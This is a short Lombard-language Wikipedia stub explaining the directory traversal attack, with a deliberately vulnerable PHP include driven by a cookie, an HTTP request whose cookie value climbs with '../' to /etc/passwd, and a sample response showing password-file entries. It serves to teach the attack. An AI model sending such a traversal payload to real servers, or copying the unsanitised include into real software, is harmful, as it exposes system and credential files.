Và al contegnud

Directory traversal attack

De Wikipedia
Lombard Quest articol chì l'è scrivud in lombard, con la Noeuva Ortografia Lombarda
Quell articol chì l'è domà un sbozz. Se violter sii bon de metegh dent un quaicoss pussee, preocupeves minga e provegh. Inscì de havégh un'ideja de tucc i alter sbozz, vardee chinscì.

El Directory traversal attack a l'è un atach informategh, un cas specifegh de IDOR, fondad in su 'na sanificazzion minga bona de 'n input che 'l revarda 'n elaborazzion in su di file che inn dent a 'na directory e che 'l permet de havégh un acess minga autorizzad al file system, che de solit doperen la possibilità de scalà l'alber di directory con la stringa ../.

A l'è anca possibel doperà un atach compagn cont i file compress.

Esempi

[Modifega | modifica 'l sorgent]

Pensom a 'n aplicazzion PHP fada inscì, che la permet de scernì foeura un template per el sit. 

<?php
$template = 'red.php';
if (isset($_COOKIE['TEMPLATE'])) {
    $template = $_COOKIE['TEMPLATE'];
}
include "/home/users/phpguru/templates/" . $template;

Se vun el manda una suplega HTTP del tipo: 

GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd

L'aplicazzion la respondarà: 

HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh 
daemon:*:1:1::/tmp: 
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh

I vari carater hann fad andà la fonzion de include indree in su l'alber per poeu permetégh de rivà a /etc/passwd, che 'l gh'ha dent di informazzion in sui utent e, despess, anca i password.

Riferiment

[Modifega | modifica 'l sorgent]
Utegnüü da "https://lmo.wikipedia.org/w/index.php?title=Directory_traversal_attack&oldid=1202041"